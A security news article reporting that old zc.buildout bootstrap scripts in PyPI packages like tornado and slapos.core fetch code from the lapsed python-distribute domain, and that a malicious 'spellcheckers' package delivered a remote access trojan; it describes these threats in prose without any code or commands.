- Legacy Python packages contain vulnerable bootstrap scripts that can enable domain takeover attacks on PyPI.
- The vulnerable bootstrap scripts fetch installation files from a now-available domain used by the obsolete Distribute package.
- Attackers could exploit the unclaimed domain to deliver malicious code via these scripts when executed.
- The bootstrap script is embedded in several popular packages, including Tornado and slapos.core, posing an ongoing risk.
- A separate malicious PyPI package named “spellcheckers” deployed a remote access trojan, demonstrating current threats to the Python ecosystem.
Cybersecurity researchers have identified security risks in older Python packages distributed through the Python Package Index (PyPI) due to vulnerable bootstrap scripts. These scripts load installation files from a defunct domain, exposing projects to potential supply chain attacks.
The issue centers on the bootstrap script associated with the build and deployment automation tool zc.buildout. This script attempts to download the installation script for the now-obsolete packaging utility Distribute from python-distribute[.]org. This domain has been available for purchase since 2014 and currently generates ad revenue. Security researcher Vladimir Pezo explained that the script fetches and installs Distribute by default or when specific command-line options are used, which creates an attack vector if the domain is acquired by malicious actors, as noted on the ReversingLabs blog.
Multiple PyPI packages, including tornado, pypiserver, slapos.core, roman, xlutils, and testfixtures, still contain the vulnerable bootstrap script. Though the script is written in Python 2 and not automatically executed during package installation, its presence offers an unnecessary attack surface that could be exploited if developers run it manually. Some affected packages have removed the script, but slapos.core and the development version of Tornado continue to include it.
This vulnerability is reminiscent of a 2023 incident with the npm package fsevents, where attackers took control over an unclaimed cloud resource to distribute malicious payloads, referenced in CVE-2023-45311.
In a separate security incident, the company HelixGuard discovered a malicious PyPI package named “spellcheckers.” This package claimed to provide spelling error detection using OpenAI Vision but in reality, installed a remote access trojan (RAT). The trojan connects to an external server to download and execute harmful code, allowing attackers to run arbitrary Python commands remotely. The package was first uploaded on November 15, 2025, by the user leo636722 and had been downloaded 955 times before removal. HelixGuard detailed the threat on their official blog.
“The issue lies in the programming pattern that includes fetching and executing a payload from a hard-coded domain, which is a pattern commonly observed in Malware exhibiting downloader behavior,” Pezo said, highlighting the risks of leaving outdated scripts in active use.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
